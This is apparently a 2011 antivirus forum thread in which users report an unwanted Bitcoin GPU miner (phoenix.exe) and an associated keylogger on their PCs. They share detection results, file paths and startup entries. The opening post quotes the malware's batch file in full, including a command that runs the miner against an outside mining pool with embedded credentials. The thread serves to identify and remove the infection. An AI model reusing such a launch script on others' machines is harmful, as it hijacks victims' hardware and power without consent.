A new pest?

Hi,
On inspecting my task manager tonight i found catalyst.exe running. Thought this was strange as ive never owned an ati card always nvidia. On further inspection i found phonix.exe also running. So traced that back to my HD in a folder called “folder1” and found this .bat file as well a other stuff.

taskkill.exe /IM phoenix.exe /F
taskkill.exe /IM function3.exe /F
c:\folder1\3\phoenix.exe -u http://mlawson_miranda:miranda@eu.triplemining.com:8344 -k poclbm AGGRESSION=1 DEVICE=0

It seems this phonix is something called a “miner” program and has something too do with “bitcoins”. What i do understand from reading tonight is that something without asking me installed this stuff on my pc, and has been trying to use my graphics card too run programs to earn this “mlawson_miranda:miranda@eu.triplemining.com” real cash !. Is this a new con or am I just behind the times ;D
and what if anything can be done to stop it. Phonix.exe isnt a virus.

upload suspicious file(s) to www.virustotal and test with 40+ malware scanners

also run a quick scan with Malwarebytes http://filehippo.com/download_malwarebytes_anti_malware/

if anything is found, you may post the result here

More Bitcoin malware
http://arstechnica.com/tech-policy/news/2011/08/symantec-spots-malware-that-uses-your-gpu-to-mine-bitcoins.ars
http://www.wired.com/threatlevel/2011/06/bitcoin-malware/
http://blog.trendmicro.com/cybercriminals-have-their-eyes-set-on-bitcoin/

The problem is Phonix.exe itself isnt a virus, its a legit program apparantly called a “miner” that these people use to earn “bitcoins” . Normaly these people run machines to harvest these “bitcoins”. The problem is that someone has come up with the idea of using other peoples computers for this process. This program aparantly likes to use a GPU rather than a CPU to do its work. It is not trying to damage the pc as a virus would, its trying to use its reasources to earn the specific person cash! in this case “miranda@eu.triplemining.com” and yes i have reported this there. Now I brought my graphics card so that I can play games not too have half its reasources and my power used to earn someone I dont know cash. The point is Avast doesnt detect these miners as viruses, and thats the problem. Avast allowed it to be installed and run. The way the program is now being used has changed. So should we be warned by virus checkers about this?

It is not trying to damage the pc as a virus would, its trying to use its reasources to earn the specific person cash! in this case "miranda@eu.triplemining.com" and yes i have reported this there.
all malware today is about money........or spam, but that is also money
Avast allowed it to be installed and run. The way the program is now being used has changed. So should we be warned by virus checkers about this?
maybe avast detect it as PUP (Possible Unwanted Program).......turn on pup scan or upload to virustotal and see

or send to avast lab for analysis if you think it should be detected

I have been having the exact same problem as the OP.

I took the Function3.exe file and ran that thru www.virustotal as you had suggested.

2/42 detected it as a virus:

Antiy-AVL saw it as “Trojan/Win32.Chifrax.gen
McAfee-GW-Edition saw it as “Heuristic.BehavesLike.Win32.Fake.K

I would think that it should probably be included in your list of things to catch.

[Edit]
I figured I should share more information on what I’ve seen happen here.

I have seen a file that was trying to extract a bunch of stuff (in the form of a function.exe file) fail during extraction. This is what brought my attention to the matter.

I would see a CRC error on extraction to c:\folder1\3\

After seeing this, I would see a phoenix.exe file, along with several other files:

  • init.pv
  • BFIPatcher.pv
  • kernel.cl
  • phoenix.exe

This stuff is sitting in folders within a kernels folder appended to the directory mentioned in the CRC error.
So the stuff was being extracted to:

  • C:\folder1\3\kernels\phatk

I hope this is enough information to help you guys figure out what to do with this.

Just a quick note.

This little pest is much more than a BC miner.

There’s a key logging component to it which will snag pretty much anything and everything. I’m not sure where it sends the data yet but you can find any existing files in the following location:

C:\Users<username>\AppData\Local\Temp\dclogs*

If anyone has more specific information it would be appreciated.

You’ll find it put startup entries into your system under “ATI .exe” (note the space) and it generates a Temp folder file called Catalyst.exe on login which I presume starts the keylogging and transmission functionality.